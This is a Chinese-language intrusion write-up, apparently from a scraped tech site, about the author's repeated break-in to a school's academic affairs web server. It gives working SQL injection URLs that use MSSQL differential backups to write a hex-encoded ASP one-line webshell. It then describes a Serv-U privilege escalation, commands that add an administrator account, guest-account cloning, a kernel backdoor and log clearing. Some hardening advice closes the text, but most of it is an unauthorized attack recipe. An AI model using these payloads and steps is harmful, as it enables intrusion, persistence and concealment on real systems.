异备份得到
webshell。第一步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x6A776368627565 backup database @a to disk=@s--备份当前数据库,以差异备份.(其中0x6A776368627565是我的当前数据库jwchbue)第二步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle];create table [dbo].[huanle] ([cmd] [image])-- 建表加字段。第三步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;insert into huanle(cmd) values(0x3C2565786563757465207265717565737428224E6565616F2229253E)-- 写入蓝屏大叔一句话木马。第四步http://xxx.xxx.xxx.xxx/News_template.asp?id=395;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x643A5C6A77635C7368656C6C2E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--。(0x643A5C6A77635C7368656C6C2E617370是备份得到webshell路径d:\jwc\shell.asp)。再次以差异备份得到插入有蓝屏大叔一句话木马的WEBSHELL 。备份得到webshell路径是http://xxx.xxx.xxx.xxx/shell.asp。第五步:http://xxx.xxx.xxx.xxx/News_template.asp?id=395;Drop table [huanle]-- 删除建立的表。小心使得万年船:)。打开备份得到的网页。
网管bitscn_com
http://xxx.xxx.xxx.xxx/shell.asp
.出现了错误。(图三)
说明你已经成功啦。利用蓝屏客户端连接,添上你的asp木马。(图四)
提交后出现了令人激动的asp木马。(图五)。
小样看你能飞出我的五指山!!呵呵!!!扫描下是否开放了ftp端口。幸运的是管理员仍然用的是serv-u4.0版本的。(图六)
网管下载dl.bitscn.com
看来取得权限只是时间上的问题啦。利用刚刚得到的asp木马上传一个超级大马桂林老兵的asp站长助手。(图七)
仍然可以浏览任意盘,并且可以利用cmd.exe .上传serv-u的本地溢出程序,net user test test /add,net localgroup administrators test /add(图八)。
就这样第X次拿到学校教务处的绝对权限。因为开了3389所以不费力气去开终端,(图九)
网管联盟bitsCN_com 这次不会让“肉鸡”跑了。不仅克隆了guest帐号和再次读出了管理员的密码还放了内核级的后门程序,最后当然是清理脚印。我想管理员没有想到这么快会有入侵者再次“光临”吧。
sql注入、上传型漏洞、serv-u提升权限已经流行了很长一段时间啦,说明教务处网站管理员不是很注意网络的安全。从小小的一个sql注入漏洞竟然可以拿到系统的administrator权限是多么恐怖的一件事情。可以看出安全是一个整体。毕竟是自己学校的网站也不好意思去破坏。(本人可是个好人哦)还是帮学校做下安全吧。系统已经打上了sp4和最新的补丁,管理员只是注重系统的安全,也可以说管理员很懒惰。问题的原因还是web程序上出现了漏洞,补上sql防注入的程序,serv-u下个最新的版本,并严格控制权限。mssql也打上了最新的补丁,并且严格控制任意盘的权限,重中之重是控制好c:\program file\serv-u、启动项目、等一些重要的目录的权限。web程序也给出专门的管理人员权限,我想基本上算是安全了吧。本文没有什么技术含量,用到的都是一些常用的入侵方法。比如guest权限下重起主机,这也是提升权限的一个方法。只是想告诉大家入侵并不是一成不变的,如果在入侵中多动下脑收获会更多。文章写作匆忙,难免会有纰漏,还望指正。
评论加载中…
